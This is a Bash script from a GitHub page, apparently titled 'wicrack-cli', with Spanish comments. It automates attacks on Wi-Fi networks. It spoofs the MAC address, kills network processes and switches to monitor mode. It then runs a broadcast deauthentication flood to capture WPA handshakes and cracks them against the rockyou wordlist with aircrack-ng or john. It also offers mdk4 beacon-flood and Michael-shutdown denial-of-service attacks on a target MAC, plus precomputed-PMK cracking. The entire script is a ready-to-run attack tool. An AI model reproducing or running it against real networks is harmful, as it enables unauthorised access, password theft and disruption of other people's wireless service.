-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathwicrack-cli
322 lines (255 loc) · 7.42 KB
/
wicrack-cli
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
#!/bin/bash
#--------------------------------------
# Cracking Wifi a través de |
# intercepción de handshakes |
# deautenticación y demás. |
# |
# Juanma Coello (aka) ShadowVMX |
#--------------------------------------
#Primero comprobaremos tus interfaces inalámbricas, actualmente la que está en el wpa_supplicant.
#
#Por otro lado, situaremos y modificaremos la MAC.
#
#Debemos de matar ciertos procesos que van a interferir con el cracking.
#
#Pondremos la interfaz de red en modo monitor.
#
#Situamos el ataque y listo.
#
#---------------------------------------------------------------------------------------------------
#LLAMAMOS AL BANNER.
./banner.sh
sleep 2
#Preguntamos qué va a realizar.
echo "[*]1. Deauth-Attack."
echo "[*]2. Beacond Flood-Attack."
echo "[*]3. Michael Shutdown Exploitation-Attack."
echo "[*]4. PMKS-Deauth Generate-Attack."
echo " "
#------------------------------------------------------------
read -p "Marque el ataque que llevará a cabo --> " attack
echo " "
#Dejamos la modificación y seteamos abajo el attack.
#Mostramos e indicamos el camibio.
echo " "
iwconfig | head -1
echo " "
read -p "Escriba el nombre de la interfaz inalámbrica que va a usar --> " iface
echo " "
echo "__________________________________________________________________________"
macchanger -s $iface
echo "__________________________________________________________________________"
echo " "
#Tiramos la interfaz.
ifconfig $iface down
#Hacemos la modificación.
echo "Ahora, una vez hemos visualizado la dirección MAC, vamos a modificarla."
echo " "
macchanger -l | grep -E --color '[0123456789abcdef][0123456789abcdef]:[0123456789abcdef][0123456789abcdef]:[0123456789abcdef][0123456789abcdef]'
echo " "
read -p "Seleccione el OUI deseado [Los que están marcados en rojo] --> " ouid
echo " "
macchanger --mac=$ouid:14:2d:f2 $iface
echo " "
#Limpiamos tanta información en pantalla.
clear
echo "[+]LISTOS PARA INICIAR LA SECUENCIA DE CRACKING WIFI."
echo " "
echo "_____________________________________________________________________________"
macchanger -s $iface
echo "_____________________________________________________________________________"
#Levantamos la interfaz.
ifconfig $iface up
#Matamos procesos.
echo " "
echo "Vamos a eliminar los procesos que no deben de estar activos."
echo " "
pkill dhclient &> /dev/null
pkill wpa_supplicant &> /dev/null
sleep 2
echo "[*]dhclient --> DEAD"
sleep 2
echo "[*]wpa_supplicant --> DEAD"
echo " "
#Ponemos la interfaz en modo monitor.
new=mon
newiface=$iface$new
echo " "
echo "Poniendo interfaz en modo monitor."
airmon-ng start $iface &> /dev/null
sleep 2
echo " "
echo "[*]$iface$new monitor --> OK"
echo " "
#RECUERDA QUE LA INTERFAZ EN MODO MONITOR ES --> $newiface [LAQUESEA+MON]
#-------------------------------------------------------------------------------------
#Toca llamar a las funciones.
function decryptk(){
trap deauth EXIT
clear
echo "[+]DE-AUTENTICATE ATTACK[+]"
echo " "
echo "Vamos a capturar, pulsa control + c cuando quieras parar."
sleep 4
airodump-ng $newiface
}
function deauth(){
echo " "
read -p "Canal que desea analizar --> " canal
airmon-ng stop $newiface &> /dev/null
sleep 1
airmon-ng start $iface $canal &> /dev/null
echo " "
read -p "ESSID que desea crackear --> " essid
echo " "
read -p "Nombre de la captura que va a generar --> " captura
echo " "
echo "Vamos a ejecutar todo el proceso..."
echo " "
echo "[+]NO TOQUE NADA[+]"
echo " "
xterm -e zsh -c "timeout 8 aireplay-ng -0 10 -e $essid -c FF:FF:FF:FF:FF:FF $newiface"
xterm -e zsh -c "timeout 30 airodump-ng -c $canal -w $captura --essid $essid $newiface"
echo " "
sleep 1
ls -l
echo " "
read -p "Copie el nombre que acabe con .cap y cópielo entero aquí --> " archivo
echo " "
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
echo " "
read -p "Elija la herramienta para realizar la fuerza bruta [john(J) || Aircrack(a)] --> " tool
echo " "
if [[ $tool = "J" ]] || [[ $tool = "j" ]]; then
echo "Ejecutando John ..."
echo " "
read -p "Indique el nombre de salida de la captura nueva que se va a generar --> " newcap
echo " "
aircrack-ng -J $newcap $archivo &> /dev/null
echo " "
clear
ls -l
echo " "
read -p "Indique el nombre del archivo que acaba en .hccap --> " hccapar
echo " "
hccap2john $hccapar > mihash
echo " "
echo "[+]EJECUTANDO FUERZA BRUTA[+]"
echo " "
john --wordlist=/usr/share/wordlists/rockyou.txt mihash
echo " "
echo "[+]COMPLETADO[+]"
fi
if [[ $tool = "A" ]] || [[ $tool = "a" ]] ; then
echo "[+]EJECUTANDO FUERZA BRUTA[+]"
echo " "
aircrack-ng -w /usr/share/wordlists/rockyou.txt $archivo
echo " "
echo "Si el ataque no ha sido exitoso, repita la acción."
echo " "
airmon-ng stop $newiface
fi
}
function bflood(){
echo "[+]BEACON FLOOD ATTACK[+]"
echo " "
echo "Déjale, al menos 2 minutos de inundación de espectro."
echo " "
echo "ctrl+c para parar ataque."
echo " "
echo "[+]DEPRECATED ATTACK[+]"
echo " "
xterm -e zsh -c "mdk4 $newiface b -s 100"
airmon-ng stop $newiface
}
function premichael(){
trap michael EXIT
echo "Pulse control+c para parar."
echo " "
echo "Recuerde copiar la MAC del objetivo."
echo " "
sleep 6
airodump-ng $newiface
}
function michael() {
echo " "
echo "[+]MICHAEL SHUTDOWN EXPLOITATION ATTACK[+]"
echo " "
echo "[+]DEPRECATED[+]"
echo " "
echo "Funcional en algunos dispositivos... Por probar..."
echo " "
read -p "Ingrese la MAC --> " address
echo " "
xterm -e zsh -c "mdk4 $newiface m -t $address"
airmon-ng stop $newiface
}
function precomputado(){
echo " "
echo "[+]PRECOM SELECTED[+]"
echo " "
ls -l passwords-airolib &> /dev/null
if [[ $? = 0 ]] ; then
echo "[*]Data --> OK"
else
airolib-ng passwords-airolib --import passwd /usr/share/wordlists/rockyou.txt
fi
ls -l essid.lst &> /dev/null
if [[ $? = 0 ]] ; then
echo "[*]Data --> OK"
else
echo "$essid" > essid.lst
airolib-ng passwords-airolib --import essid essid.lst
fi
echo " "
echo "[+]PUEDES CERRAR CUANDO QUIERAS, PERO SE RALENTIZARÁ EL ATAQUE.[+]"
echo " "
xterm -e zsh -c "airolib-ng passwords-airolib --batch"
echo " "
ls -l
echo " "
read -p "Copie el archivo que tenga la extensión .cap --> " captura
aircrack-ng -w passwords-airolib $captura
airmon-ng stop $newiface
}
function killcomputo(){
echo " "
echo "Cierre cuando sepa el canal y el essid."
echo " "
xterm -e zsh -c "airodump-ng $newiface"
echo " "
read -p "Canal que desea analizar --> " canal
airmon-ng stop $newiface &> /dev/null
sleep 1
airmon-ng start $iface $canal &> /dev/null
echo " "
read -p "ESSID que desea crackear --> " essid
echo " "
read -p "Nombre de la captura que va a generar --> " captura
echo " "
echo "Vamos a ejecutar todo el proceso..."
echo " "
echo "[+]NO TOQUE NADA[+]"
echo " "
xterm -e zsh -c "timeout 8 aireplay-ng -0 10 -e $essid -c FF:FF:FF:FF:FF:FF $newiface"
xterm -e zsh -c "timeout 30 airodump-ng -c $canal -w $captura --essid $essid $newiface"
echo " "
sleep 1
ls -l
echo " "
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
precomputado
}
#Creamos el acceso a los distintos módulos de ataque
if [[ $attack = 1 ]] ; then
decryptk
elif [[ $attack = 2 ]] ; then
bflood
elif [[ $attack = 3 ]] ; then
premichael
elif [[ $attack = 4 ]] ; then
killcomputo
else
echo "[+]EXIT[+]"
fi
#----------FIN----------